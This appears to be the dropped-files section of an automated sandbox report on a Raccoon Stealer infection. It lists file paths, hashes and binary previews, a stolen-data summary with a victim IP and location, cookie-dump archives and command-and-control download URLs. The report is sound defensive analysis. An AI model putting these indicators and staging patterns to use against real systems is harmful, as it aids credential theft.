SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\EeMH4LpMlGU.zip Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	2044
Entropy (8bit):	7.485067103070951
Encrypted:	false
MD5:	9DF7FF4F9535EFE5E73EA315BD554C72
SHA1:	D965C7083CA17CB95CEBE5823F393FD662DCA6C6
SHA-256:	9965AD399FC98813F5997F5F472547294AED96DDA943502C4EDE608A97A88A36
SHA-512:	A58FB3BCE8D561C7632FD6686F2A6116211F17A46AE9E9260BDA65301C2E76B34F9724765EB16203370DF54C2DB4EA32400F16E56D9D9C79352C634D3B501589
Malicious:	false
Reputation:	low
Preview:	PK..........-Q.d.[....F......browsers/cookies/Google Chrome_Default.txtUT.....^_..^_..^_m..r.0...q.O..@8... .!EP....P..US..t<..=.a....~.A...xy.[.Rfq..r.....F_..D.T.Ui...=k..G.....9<...B.CZ..d_aX.h.).......A.6..#.....On%.z.k.M<...[......]wk_{R....>.T.....;2,...&.J.gxXE.....[.O'...+.. .d...!0K.2.9X+.pV9...... Lm.b..m.f.G.4!!.O'?PK..........-Q.]5.9...2...-...browsers/cookies/Firefox_lh46xpzs.default.txtUT...3.^_3.^_3.^_..MO.@...K.Oi.w.{...b..i............z.11..x..<3.u.[..,S....9\.......1.....c...sh......mQ..]..4.@W..i.9ft.k..."i.8lL..i.6...f.V..I..I.....dF...e.<T.S...l7..GL..{..oo.ltUnLP..-.....w...c.T.{.''..p.......b-....x.%..K....@.....1.B0m.Q.`.TDP....J..X..}.OQ..K\J$..3.^.q..fW!.'Vya.(.K...?`.).]-}...... ..>.PK.........-Q.X.....%.......browsers/firefox_urls.txtUT...4.^_4.^_4.^_...R.())(...///......I../J.O.....O.,JM..73.3.3.q.K.J..y...K.J...y.\|..K..2.3A\S.sS.S3.Cs.K...^^. ..gQAQfYbr%.*.F..!qFC.@...F&p..PK.........-Qe%_ ....?.......System Info.txtUT...

C:\Users\user\AppData\LocalLow\RYwTiizs2t Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	SQLite 3.x database
Size (bytes):	73728
Entropy (8bit):	1.1412500775740033
Encrypted:	false
MD5:	DC53F6E7C539B32EED83E85CF34C978D
SHA1:	2DFACAE91E3A14A3DA296CD8D4B6793313388F3B
SHA-256:	ED8B543797D2AE62D63CA53416067A12BF6FBE9F498E5D021C3532ECDBF6039F
SHA-512:	65802DF952DD7ADD4851EDD3BBA225DC5FC5ED2609C1FB02CF49E7569F8C1ED546916E61EFE6EB14B959C86E28327D07467948E64714373EE342918C21D536AB
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .......$........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\firefox_urls.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	ASCII text, with CRLF, CR line terminators
Size (bytes):	293
Entropy (8bit):	5.098710061977143
Encrypted:	false
MD5:	DCA4F2EAA20EF03C082B05DEC0589AD3
SHA1:	B81EB6E297D14DBD2EB704B399CF2042FB86E9F2
SHA-256:	C4F937DFDA948719B128945882D076C17936655DC1E4AB35F3D6E0AFDFB079ED
SHA-512:	1DD4163B1D231B46AD89859AD8051CEB2363B1ED45F795C824F52B2B8E6F58B7BA8D217813548F86F11C913E5F8C0ABADB7B6FEF0A3241A569CC98A81A56CAC2
Malicious:	false
Reputation:	low
Preview:	URL: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/..Count: 1..Last visit: 1587545601749000......URL: https://www.mozilla.org/privacy/firefox/..Count: 1..Last visit: 1587545603030000......URL: https://www.mozilla.org/en-US/privacy/firefox/..Count: 1..Last visit: 1587545603124000......

C:\Users\user\AppData\LocalLow\frAQBc8Ws Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	SQLite 3.x database, user version 10
Size (bytes):	524288
Entropy (8bit):	0.04987700130217276
Encrypted:	false
MD5:	04342D0F1D88E2EFA637279416F4F4FA
SHA1:	38F2C3CADEEC8A21AC8B6B7C2CB00ABC6EEAC89C
SHA-256:	A0B2970B3E5E50E8B5FF149BD2A36A130F8AEB18D3C6B36C5AAC823FFCBFAB1A
SHA-512:	25D5682047A979C828B8ACF2B5C1CD3D48BD0187C5FFDB3CD60B0A61CAD7670C6C5F99FAAE66BDC73F675BB1FA30447CEB05F25402384B5ED6938D9F0415A150
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................;..~...{..{...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\frAQBc8Wsa Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	SQLite 3.x database
Size (bytes):	18432
Entropy (8bit):	0.8485072309301305
Encrypted:	false
MD5:	D6CF782746947CA53702AD392D12FAF7
SHA1:	5479CF56B4B51204FD1A46AE722BE54E7442B28F
SHA-256:	D2E19D00528F96FBC4A34C4429B8E2B36D0B8163F0BCFF098FA07C72273F2A3F
SHA-512:	FB75735816103BB2A203E04CA7902FB72EDC00CB22B4B62A7D952DF3998B7C0C4DB57428CB4A48F162271B7F73BF252D51D4B1872674B220169F73A4CF748887
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .....................................................................................g.....:.3.E.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N...%..oindexstats_originstats.CREATE INDEX stats_origin ON stats(origin_domain).@......._tablestatsstats.CREATE TABLE stats (origin_domain VARCHAR NOT NULL, username_value VARCHAR, dismissal_count INTEGER, update_time INTEGER NOT NULL, UNIQUE

C:\Users\user\AppData\LocalLow\machineinfo.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	ASCII text, with CRLF, CR line terminators
Size (bytes):	1087
Entropy (8bit):	5.348815910455206
Encrypted:	false
MD5:	9A4C0D6FA0D4B580D154D95D74846ED4
SHA1:	8590640E5C6F0717AE67AB865643B8D5694EA29A
SHA-256:	E46B6A4816AB44C59AB672C63DC78ECB596CF063581E2674AA3BAE200F82E7FD
SHA-512:	C48BD5532654ABA4FD5323422A9FF0B615088B2A28004DCD8D81B9ABCFE2D3F3B07ACBD530067F119549DDAAD54F8023E2676084F8AC87AAF67A772E9CBC9995
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: C:\Users\user\AppData\LocalLow\machineinfo.txt, Author: Joe Security
Reputation:	low
Preview:	[Raccoon Stealer] - v1.5.13-af-hotfix Release...Build compiled on Mon Jul 6 14:33:03 2020...Launched at: 2020.09.14 - 03:55:16 GMT...Bot_ID: 717E1B34-6140-4FC8-B497-B7800CAA7E40_user...Running on a desktop......=R=A=C=C=O=O=N=...... - Cookies: 8.. - Passwords: 0.. - Files: 0......System Information:...... - System Language: English...... - System TimeZone: -8 hrs...... - IP: 91.132.136.206...... - Location: 47.392502, 8.454600 \| Zurich, Zurich, Switzerland (8010).... - ComputerName: 528110... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores).... - RAM: 8191 MB (6822 MB used).... - Screen resolution: 1280x1024...... - Display devices:....0) Microsoft Basic Display Adapter.....============....Installed Apps: ...Adobe Acrobat Reader DC (18.011.20055)...Google Chrome (67.0.3396.99)...Google Update Helper (1.3.33.17)...Java 8 Update 171 (8.0.1710.11)...Java Auto

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	SQLite 3.x database
Size (bytes):	20480
Entropy (8bit):	1.0906799377380432
Encrypted:	false
MD5:	EE37E3385A643FDAF98010FC8C0AEBCE
SHA1:	750F9FE78E3246068D4D74BC2CA4D0A3E2DCA61B
SHA-256:	BDE8F29DE3D23321B72AE592437B98346E24BAA2154D711F9EFBECEDC78A3DA0
SHA-512:	8CEDBD587826D2D17A18D3421287B604487A7EC30BB82F872ADE29BD94679E93ED744EEDF599630C11ED624320D04B684BC576ACBD24D88099598CE1AA7A2267
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..................................................................................A..g...A.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

C:\Users\user\AppData\LocalLow\y2017hGX7 Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	SQLite 3.x database, user version 53
Size (bytes):	5242880
Entropy (8bit):	0.035575761794413165
Encrypted:	false
MD5:	1EFC6E77C3DC2C3F6E122483D573260A
SHA1:	43C411E500A0718F43136975FD51367DB7B13885
SHA-256:	5C0066546311F66E7761A0207292BFB133C68CA3A781F7775992F63FA80C6BA1
SHA-512:	EAFA1BE0B51E8353C1A0C34382E74949DE4A9DC9DE5195C242ACA22BB6ABC0E7BD82831430ADD4C3268F8080299910F363491837D136DFB5C5C710AE1E37B0EE
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .......'........... ...................5..................................;..y%.&h..h.}.}p}.\|.\|.{.z.z9y.y-x+x.wIw.u.t.u.t.t.spr.rmq.r4qAp.o.pXn.n.l.l'k.kpj.k9..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\48WEP9S3\libs[1].zip Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Reputation:	low
IE Cache URL:	http://chinadevmonster.top/gate/libs.zip
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\XNNLI5Z9\sqlite3[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Reputation:	low
IE Cache URL:	http://chinadevmonster.top/gate/sqlite3.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

C:\Users\user\AppData\Local\Temp\210A.tmp Download File
Process:	C:\Users\user\AppData\Roaming\cwfbibg
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	1620872
Entropy (8bit):	6.29668569391801
Encrypted:	false
MD5:	CDC66BF7EF420EA0F569FC632EE25F58
SHA1:	1F36C06B5E5A96C098574E37AF730D4D72CF3CF1
SHA-256:	D2E848F8CD32269747B8A162B4406620A360CFF1AA66699DAF4DF372A90EA01D
SHA-512:	B7ABCE126BCBC3D88D8CC5FD6F8DB1018ADF292715578D4456F8C117FBF2B6F5D57EC5A03726864323471D2497CD9E9C24C8F548044CBFE9901F79AD39FA0D8C
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L!y>.@.m.@.m.@.m...l.@.mg$.l.@.mg$.lN@.mg$.l.A.mg$.l.@.mg$.l.@.mg$.m.@.mg$.l.@.mRich.@.m........................PE..L...z.]............!.....&...................P....(K.................................{....@A.............................&..............8............b...Y.......N...l..T............................................................................text....#.......$.................. ..`RT...........@.......(.............. ..`.data...dW...P.......*..............@....mrdata.h#.......$...8..............@....00cfg...............\..............@..@.rsrc...8............^..............@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3BD3.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	415744
Entropy (8bit):	7.807801452429642
Encrypted:	false
MD5:	8576CCC1310EA39D4AC4B642C7700F91
SHA1:	4FE58F2A23DE5B9131CDD2E5F287EB915D07B31C
SHA-256:	38FAF804E3D8398130EDFAAC516EE62C96C6043A4B3F64CF432B17DEFCA0C6E4
SHA-512:	06D6E7E6501C00424FE52009B87493DBC6046208E534EF2D7847226A7A16970DF73BC95AA6436E29ED7122D7AE7863A4D98677ABFF3E72869DD3237FEAAC9C1C
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@....z...z...z...(z.'z...(k..z...(}.uz..#....z...z...z...(t..z...(j..z...(o..z..Rich.z..................PE..L....<Z]............................L.............@..................................<......................................l...<.... ..0M...................p..........................................@............................................text.............................. ..`.rdata...$.......&..................@..@.data...."..........................@....rsrc...0M... ...N..................@..@.reloc.......p.......:..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\48F3.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	200192
Entropy (8bit):	7.045356546552803
Encrypted:	false
MD5:	1C886F74C9051CE8BE91FEC2083744F2
SHA1:	B58858BA04F6B66C7FF52B5F822EACC3229BC867
SHA-256:	63525C5A7E8B750C9F901826424B09765428FBCE52555FBE5D88283F49BBF04A
SHA-512:	74E64A295762AE51D39EA8213EC811F201111F48908697576283FEDB82263AE1851B1542D4116C346EEBCF0796B3AF271B940B323C30986B6C8D9C54A6021E6B
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.p.V.#.V.#.V.#..i#.V.#..x#.V.#..n#.V.#.#.V.#.V.#[V.#..g#.V.#..y#.V.#..\|#.V.#Rich.V.#........................PE..L...~g[].................8..........a........P....@.......................... ......oe.......................................h..P........9......................D....................................................P...............................text...S7.......8.................. ..`.rdata...$...P...&...<..............@..@.data................b..............@....rsrc....9.......:...t..............@..@.reloc...^.......`..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Ogeq\tiik.exe Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	200192
Entropy (8bit):	7.045356546552803
Encrypted:	false
MD5:	1C886F74C9051CE8BE91FEC2083744F2
SHA1:	B58858BA04F6B66C7FF52B5F822EACC3229BC867
SHA-256:	63525C5A7E8B750C9F901826424B09765428FBCE52555FBE5D88283F49BBF04A
SHA-512:	74E64A295762AE51D39EA8213EC811F201111F48908697576283FEDB82263AE1851B1542D4116C346EEBCF0796B3AF271B940B323C30986B6C8D9C54A6021E6B
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.p.V.#.V.#.V.#..i#.V.#..x#.V.#..n#.V.#.#.V.#.V.#[V.#..g#.V.#..y#.V.#..\|#.V.#Rich.V.#........................PE..L...~g[].................8..........a........P....@.......................... ......oe.......................................h..P........9......................D....................................................P...............................text...S7.......8.................. ..`.rdata...$...P...&...<..............@..@.data................b..............@....rsrc....9.......:...t..............@..@.reloc...^.......`..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cwfbibg Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	129024
Entropy (8bit):	6.905956768984892
Encrypted:	false
MD5:	18B04E2FD804D553D9A35E088193DEA7
SHA1:	F3DFEC27D03905211940DA451E9EE1ED500ABF33
SHA-256:	34DEA8FB86E0F4D24CE31FB3D0B87D70FEEA93E48D3E74A3347001AD590F9B43
SHA-512:	914A7161D15A23165B3F49B404495F691C35B342BAE6CC853BF4BEC5A4D8338BEB52C9D1DE43F5E156E82FA2641726B4C9D015270402B20CD33D36CA467A4391
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%#..DM..DM..DM......DM......DM.....DM..6..DM..DL.ODM......DM......DM......DM.Rich.DM.........PE..L...C".].................P...................`....@..........................0......ZN.......................................x..<.......0M...........................................................................`...............................text....O.......P.................. ..`.rdata...$...`...&...T..............@..@.data...H"...........z..............@....rsrc...0M.......N..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cwfbibg:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
